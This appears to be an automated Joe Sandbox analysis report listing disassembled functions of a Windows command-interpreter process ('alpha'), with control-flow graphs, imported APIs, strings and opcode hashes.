                              • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                              • String ID: :
                              • API String ID: 1809961153-336475711
                              • Opcode ID: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                              • Instruction ID: d973879bed12015df72a4bba9b949f625cdeec3256fa404a73f32ec130896df1
                              • Opcode Fuzzy Hash: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                              • Instruction Fuzzy Hash: 19D11C2260CB85C2EB64BF16E4952A9A7B1FB84750F884235DD8E426E9DF3CE944DB10

                              Control-flow Graph

                              control_flow_graph 602 7ff744f12394-7ff744f12416 memset call 7ff744f0ca40 605 7ff744f1241c-7ff744f12453 GetModuleFileNameW call 7ff744f1081c 602->605 606 7ff744f1e0d2-7ff744f1e0da call 7ff744f14c1c 602->606 611 7ff744f1e0db-7ff744f1e0ee call 7ff744f1498c 605->611 612 7ff744f12459-7ff744f12468 call 7ff744f1081c 605->612 606->611 618 7ff744f1e0f4-7ff744f1e107 call 7ff744f1498c 611->618 617 7ff744f1246e-7ff744f1247d call 7ff744f1081c 612->617 612->618 623 7ff744f12483-7ff744f12492 call 7ff744f1081c 617->623 624 7ff744f12516-7ff744f12529 call 7ff744f1498c 617->624 625 7ff744f1e10d-7ff744f1e123 618->625 623->625 632 7ff744f12498-7ff744f124a7 call 7ff744f1081c 623->632 624->623 628 7ff744f1e13f-7ff744f1e17a _wcsupr 625->628 629 7ff744f1e125-7ff744f1e139 wcschr 625->629 634 7ff744f1e17c-7ff744f1e17f 628->634 635 7ff744f1e181-7ff744f1e199 wcsrchr 628->635 629->628 633 7ff744f1e27c 629->633 642 7ff744f124ad-7ff744f124c5 call 7ff744f13c24 632->642 643 7ff744f1e2a1-7ff744f1e2c3 _wcsicmp 632->643 637 7ff744f1e283-7ff744f1e29b call 7ff744f1498c 633->637 638 7ff744f1e19c 634->638 635->638 637->643 641 7ff744f1e1a0-7ff744f1e1a7 638->641 641->641 645 7ff744f1e1a9-7ff744f1e1bb 641->645 651 7ff744f124ca-7ff744f124db 642->651 646 7ff744f1e1c1-7ff744f1e1e6 645->646 647 7ff744f1e264-7ff744f1e277 call 7ff744f11300 645->647 649 7ff744f1e1e8-7ff744f1e1f1 646->649 650 7ff744f1e21a 646->650 647->633 653 7ff744f1e201-7ff744f1e210 649->653 654 7ff744f1e1f3-7ff744f1e1f6 649->654 657 7ff744f1e21d-7ff744f1e21f 650->657 655 7ff744f124e9-7ff744f12514 call 7ff744f18f80 651->655 656 7ff744f124dd-7ff744f124e4 ??_V@YAXPEAX@Z 651->656 653->650 659 7ff744f1e212-7ff744f1e218 653->659 654->653 658 7ff744f1e1f8-7ff744f1e1ff 654->658 656->655 657->637 661 7ff744f1e221-7ff744f1e228 657->661 658->653 658->654 659->657 663 7ff744f1e22a-7ff744f1e231 661->663 664 7ff744f1e254-7ff744f1e262 661->664 665 7ff744f1e234-7ff744f1e237 663->665 664->633 665->664 666 7ff744f1e239-7ff744f1e242 
665->666 666->664 667 7ff744f1e244-7ff744f1e252 666->667 667->664 667->665
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                              • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                              • API String ID: 2622545777-4197029667
                              • Opcode ID: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                              • Instruction ID: 97f7f5ecca4f69be744bbb1543b8bdc4c36f124577b2f96df014b3674f19a3c7
                              • Opcode Fuzzy Hash: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                              • Instruction Fuzzy Hash: F7913F61B0DA86C6EF24BF52D8951B9A3A0FF48B84FC94135CD4E476D9DE3CE9059320

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleMode_get_osfhandle
                              • String ID: CMD.EXE
                              • API String ID: 1606018815-3025314500
                              • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                              • Instruction ID: 309dece1a9c2304b93f4ee4ccd785fd950191a00393b0ef31c026ed3b4818e58
                              • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                              • Instruction Fuzzy Hash: AF41EE31A0D712CBE704BF56E994578BAA0BB99B56FCC4134CD0E423E8DF3CA454E620

                              Control-flow Graph

                              control_flow_graph 680 7ff744f0c620-7ff744f0c66f GetConsoleTitleW 681 7ff744f1c5f2 680->681 682 7ff744f0c675-7ff744f0c687 call 7ff744f0af14 680->682 685 7ff744f1c5fc-7ff744f1c60c GetLastError 681->685 686 7ff744f0c689 682->686 687 7ff744f0c68e-7ff744f0c69d call 7ff744f0ca40 682->687 688 7ff744f1c5e3 call 7ff744f03278 685->688 686->687 692 7ff744f1c5e8-7ff744f1c5ed call 7ff744f1855c 687->692 693 7ff744f0c6a3-7ff744f0c6ac 687->693 688->692 692->681 695 7ff744f0c6b2-7ff744f0c6c5 call 7ff744f0b9c0 693->695 696 7ff744f0c954-7ff744f0c95e call 7ff744f1291c 693->696 703 7ff744f0c6cb-7ff744f0c6ce 695->703 704 7ff744f0c9b5-7ff744f0c9c9 call 7ff744f15c6c call 7ff744f1855c 695->704 701 7ff744f1c5de-7ff744f1c5e0 696->701 702 7ff744f0c964-7ff744f0c972 call 7ff744f089c0 696->702 701->688 702->685 716 7ff744f0c978-7ff744f0c99a towupper 702->716 703->692 707 7ff744f0c6d4-7ff744f0c6e9 703->707 727 7ff744f0c9d0-7ff744f0c9d7 704->727 708 7ff744f0c6ef-7ff744f0c6fa 707->708 709 7ff744f1c616-7ff744f1c620 call 7ff744f1855c 707->709 712 7ff744f1c627 708->712 713 7ff744f0c700-7ff744f0c713 708->713 709->712 718 7ff744f1c631 712->718 717 7ff744f0c719-7ff744f0c72c 713->717 713->718 721 7ff744f0c9a0-7ff744f0c9a9 716->721 723 7ff744f1c63b 717->723 724 7ff744f0c732-7ff744f0c747 call 7ff744f0d3f0 717->724 718->723 721->721 722 7ff744f0c9ab-7ff744f0c9af 721->722 722->704 725 7ff744f1c60e-7ff744f1c611 call 7ff744f2ec14 722->725 732 7ff744f1c645 723->732 733 7ff744f0c8ac-7ff744f0c8af 724->733 734 7ff744f0c74d-7ff744f0c750 724->734 725->709 730 7ff744f0c9dd-7ff744f1c6da SetConsoleTitleW 727->730 731 7ff744f0c872-7ff744f0c8aa call 7ff744f1855c call 7ff744f18f80 727->731 730->731 741 7ff744f1c64e-7ff744f1c651 732->741 733->734 740 7ff744f0c8b5-7ff744f0c8d3 wcsncmp 733->740 737 7ff744f0c76a-7ff744f0c76d 734->737 738 7ff744f0c752-7ff744f0c764 call 7ff744f0bd38 734->738 744 7ff744f0c840-7ff744f0c84b call 7ff744f0cb40 737->744 745 7ff744f0c773-7ff744f0c77a 737->745 738->692 
738->737 740->737 746 7ff744f0c8d9 740->746 747 7ff744f1c657-7ff744f1c65b 741->747 748 7ff744f0c80d-7ff744f0c811 741->748 761 7ff744f0c84d-7ff744f0c855 call 7ff744f0cad4 744->761 762 7ff744f0c856-7ff744f0c85c call 7ff744f07a70 744->762 753 7ff744f0c780-7ff744f0c784 745->753 746->734 747->748 749 7ff744f0c817-7ff744f0c81b 748->749 750 7ff744f0c9e2-7ff744f0c9e7 748->750 755 7ff744f0ca1b-7ff744f0ca1f 749->755 756 7ff744f0c821 749->756 750->749 757 7ff744f0c9ed-7ff744f0c9f7 call 7ff744f1291c 750->757 758 7ff744f0c78a-7ff744f0c7a4 wcschr 753->758 759 7ff744f0c83d 753->759 755->756 763 7ff744f0ca25-7ff744f1c6b3 call 7ff744f03278 755->763 764 7ff744f0c824-7ff744f0c82d 756->764 779 7ff744f0c9fd-7ff744f0ca00 757->779 780 7ff744f1c684-7ff744f1c698 call 7ff744f03278 757->780 766 7ff744f0c7aa-7ff744f0c7ad 758->766 767 7ff744f0c8de-7ff744f0c8f7 758->767 759->744 761->762 777 7ff744f0c862-7ff744f0c86c 762->777 763->692 764->764 770 7ff744f0c82f-7ff744f0c837 764->770 772 7ff744f0c7b0-7ff744f0c7b8 766->772 773 7ff744f0c900-7ff744f0c908 767->773 770->753 770->759 772->772 774 7ff744f0c7ba-7ff744f0c7c7 772->774 773->773 775 7ff744f0c90a-7ff744f0c915 773->775 774->741 781 7ff744f0c7cd-7ff744f0c7db 774->781 782 7ff744f0c917 775->782 783 7ff744f0c93a-7ff744f0c944 775->783 777->727 777->731 779->749 786 7ff744f0ca06-7ff744f0ca10 call 7ff744f089c0 779->786 780->692 787 7ff744f0c7e0-7ff744f0c7e7 781->787 788 7ff744f0c920-7ff744f0c928 782->788 790 7ff744f0ca2a-7ff744f0ca2f call 7ff744f19158 783->790 791 7ff744f0c94a 783->791 786->749 799 7ff744f0ca16-7ff744f1c67f GetLastError call 7ff744f03278 786->799 794 7ff744f0c7e9-7ff744f0c7f1 787->794 795 7ff744f0c800-7ff744f0c803 787->795 796 7ff744f0c92a-7ff744f0c92f 788->796 797 7ff744f0c932-7ff744f0c938 788->797 790->701 791->696 794->795 800 7ff744f0c7f3-7ff744f0c7fe 794->800 795->732 801 7ff744f0c809 795->801 796->797 797->783 797->788 799->692 800->787 800->795 801->748
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleTitlewcschr
                              • String ID: /$:
                              • API String ID: 2364928044-4222935259
                              • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                              • Instruction ID: b8e50f7c11ef059dba6e433afef02a1ff7cde44faf4d7bd46017f958e31c05ea
                              • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                              • Instruction Fuzzy Hash: E2C16F61A1D682C1FB68BF179498279E2A1EF91B50FCD5131DD1E462D9EF3CE844E320

                              Control-flow Graph

                              control_flow_graph 807 7ff744f07aa0-7ff744f07ad9 808 7ff744f07aeb-7ff744f07b38 memset call 7ff744f0ca40 807->808 809 7ff744f07adb-7ff744f07ae5 call 7ff744f1291c 807->809 815 7ff744f1ae4e-7ff744f1ae53 808->815 816 7ff744f07b3e-7ff744f07b6d GetFullPathNameW 808->816 809->808 814 7ff744f1ae3a-7ff744f1ae49 call 7ff744f03278 809->814 826 7ff744f07bb7-7ff744f07bdd call 7ff744f18f80 814->826 818 7ff744f1ae61-7ff744f1ae63 815->818 819 7ff744f07b73-7ff744f07b78 816->819 820 7ff744f1ae55-7ff744f1ae5c GetLastError 816->820 822 7ff744f1af64-7ff744f1af6b call 7ff744f03278 818->822 823 7ff744f1ae68-7ff744f1ae6d 819->823 824 7ff744f07b7e-7ff744f07b91 CreateDirectoryW 819->824 820->818 827 7ff744f1ae74-7ff744f1ae7e call 7ff744f03278 823->827 828 7ff744f07b93-7ff744f07ba7 824->828 829 7ff744f07bdf-7ff744f07bf2 GetLastError 824->829 842 7ff744f1ae84-7ff744f1ae8e 827->842 835 7ff744f07bb5 828->835 836 7ff744f07ba9-7ff744f07bb0 free 828->836 832 7ff744f1ae6f 829->832 833 7ff744f07bf8-7ff744f07bfb 829->833 832->827 833->818 839 7ff744f07c01-7ff744f07c08 833->839 835->826 836->835 840 7ff744f07c0e-7ff744f07c2e 839->840 841 7ff744f1af5f 839->841 840->842 843 7ff744f07c34-7ff744f07c4a 840->843 841->822 842->841 844 7ff744f1ae94-7ff744f1aea4 842->844 845 7ff744f07cd1-7ff744f07ced CreateDirectoryW 843->845 846 7ff744f07c50 843->846 844->841 847 7ff744f1aeaa-7ff744f1aeca 844->847 845->828 848 7ff744f07cf3 845->848 849 7ff744f07cbe-7ff744f07cc1 846->849 852 7ff744f1aecc 847->852 853 7ff744f1aef1-7ff744f1aef5 847->853 854 7ff744f1af46-7ff744f1af54 GetLastError 848->854 850 7ff744f07cc3-7ff744f07cc6 849->850 851 7ff744f07cad-7ff744f07cb0 849->851 856 7ff744f07ca5-7ff744f07cab 850->856 857 7ff744f07cc8 850->857 861 7ff744f07c52-7ff744f07c79 CreateDirectoryW 851->861 862 7ff744f07cb2-7ff744f07cbb 851->862 858 7ff744f1aecf-7ff744f1aed6 852->858 859 7ff744f1aef7-7ff744f1af00 853->859 860 7ff744f1af03-7ff744f1af0b 853->860 854->828 855 7ff744f1af5a 854->855 855->818 
856->851 867 7ff744f07cca 856->867 857->861 858->853 863 7ff744f1aed8-7ff744f1aeef 858->863 859->860 860->845 864 7ff744f1af11-7ff744f1af18 860->864 865 7ff744f07c8f-7ff744f07ca0 861->865 866 7ff744f07c7b-7ff744f07c89 GetLastError 861->866 862->849 863->853 863->858 868 7ff744f1af1a-7ff744f1af31 864->868 869 7ff744f1af33-7ff744f1af37 864->869 865->856 866->841 866->865 867->845 868->864 868->869 869->845 870 7ff744f1af3d 869->870 870->854
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CreateDirectoryDriveFullNamePathTypefreememset
                              • String ID:
                              • API String ID: 1445986735-0
                              • Opcode ID: 964aebb90721e81bfd08c07265eff513d24d8c56c735c939700b0a9033b58433
                              • Instruction ID: 32632971fc774d307bb2d75e1c1323aff88500682a0ec6e8ad495338f62c33bf
                              • Opcode Fuzzy Hash: 964aebb90721e81bfd08c07265eff513d24d8c56c735c939700b0a9033b58433
                              • Instruction Fuzzy Hash: 3A917362A0CB82C6EB65BF1294846B9F3A1FB84B85F898135DD4D077D8DF3CD940A720

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                              • String ID:
                              • API String ID: 4291973834-0
                              • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                              • Instruction ID: a975b078e1f409cfba208c3e6e3cb99acd71dbf43d12ad3d933532e75396944f
                              • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                              • Instruction Fuzzy Hash: 4A41A031A0CA02C6FB50BF52EAC0279A2A5AB54784FC84535DD4D876E8DF7CEC94A760

                              Control-flow Graph (rendered graph not reproduced)
                              APIs
                              • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A28
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A66
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A7D
                              • memmove.MSVCRT(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A9A
                              • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14AA2
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                              • String ID:
                              • API String ID: 1623332820-0
                              • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                              • Instruction ID: bdb44c50045fdb1e58795b7cba7463e67017244e6ce5f0ba37a7d60873be03ed
                              • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                              • Instruction Fuzzy Hash: C0119122A1C742C2DB10BF02A454039FBB0EB89F80B9D9035DE4E03788DE3DE8419760

                              Control-flow Graph (rendered graph not reproduced)
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset
                              • String ID: onecore\base\cmd\maxpathawarestring.cpp
                              • API String ID: 2221118986-3416068913
                              • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                              • Instruction ID: d68bab9a3694ba35ec607accdd3fd8a8cbd7a44ef28edcdee22fa909431904d6
                              • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                              • Instruction Fuzzy Hash: B011C621A0D682C1EB54FF57A1D42B992A09F84BA4F9C4331DE6D4B7DDEE2CD480A320

                              Control-flow Graph (rendered graph not reproduced; entry block 7ff744f0be00, highest block 7ff744f0bfc7-7ff744f0bfe1; the only imported call is memset in block 7ff744f0be47-7ff744f0be69, the remaining calls target internal functions at 7ff744f0bff0, 7ff744f0cd90, 7ff744f0c620, 7ff744f0b0d8, 7ff744f071ec, 7ff744f088a8, 7ff744f10a6c, 7ff744f1081c, 7ff744f0af98 and 7ff744f15ad8; the executed/not-executed colouring of the blocks was lost in extraction)
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memsetwcschr
                              • String ID: 2$COMSPEC
                              • API String ID: 1764819092-1738800741
                              • Opcode ID: 67b7d9532635b88408f7fdf8ce2ffd15aa8064fbcc0e84cfd1dfe15bdfd98c80
                              • Instruction ID: be28c3af4466759b3fa88b8c37f47ddfd7a375fcf8d5c6c9d531115607d5ed44
                              • Opcode Fuzzy Hash: 67b7d9532635b88408f7fdf8ce2ffd15aa8064fbcc0e84cfd1dfe15bdfd98c80
                              • Instruction Fuzzy Hash: 36516921A1C643C5FB64BFA3A4C9379E2919FC5B84F8C4031DE0D4A6DEDE2CF844A661
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Concurrency::cancel_current_taskmalloc
                              • String ID:
                              • API String ID: 1412018758-0
                              • Opcode ID: 738c8df77e10b4e497db5d3a2d7ddec6b27d778605f8f6b2fdfcc597a874d2dd
                              • Instruction ID: 5a6b0ad1117d7046d1347a568a92a52e0f9609c87e45a28278a71ca1e95f116d
                              • Opcode Fuzzy Hash: 738c8df77e10b4e497db5d3a2d7ddec6b27d778605f8f6b2fdfcc597a874d2dd
                              • Instruction Fuzzy Hash: 79E03240E0E20BC2FB283FA368C257892605F18B40F8C2430CD0D4A7CEEE2DA895E270
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDA6
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDBD
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                              • Instruction ID: d10e3ccbb626919f7bc1ad86611c1fe8da04576b537b1b4bc2b994ad73cea7e5
                              • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                              • Instruction Fuzzy Hash: 95F01D31A1C642C6EB14BF16F884578F7A0FB99B40B9C9434DE4E03398DF3CA441E610
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: exit
                              • String ID:
                              • API String ID: 2483651598-0
                              • Opcode ID: 9ddfc09aa9d90f0088fd16abda3ebe38fb5bbbe8bdae055d7e84e31eac367ca0
                              • Instruction ID: 7710e6d0b294a27612e4b708d2cecc0d89f52baa82a7abeca6efe723b315ab64
                              • Opcode Fuzzy Hash: 9ddfc09aa9d90f0088fd16abda3ebe38fb5bbbe8bdae055d7e84e31eac367ca0
                              • Instruction Fuzzy Hash: 8DC0123070C686C7EB1C7F3224D203995745B48201F48553CCD16852C5DE2CD8049610
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: DefaultUser
                              • String ID:
                              • API String ID: 3358694519-0
                              • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                              • Instruction ID: c96279c03d28a59c3891dd195563f59f44b9e76fd5f8c5117aa551d2f084abb9
                              • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                              • Instruction Fuzzy Hash: DCE08CA2D1C252CAF7943E4360C12B49963CB78786FC85031CE0E016C8592D3C416228
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
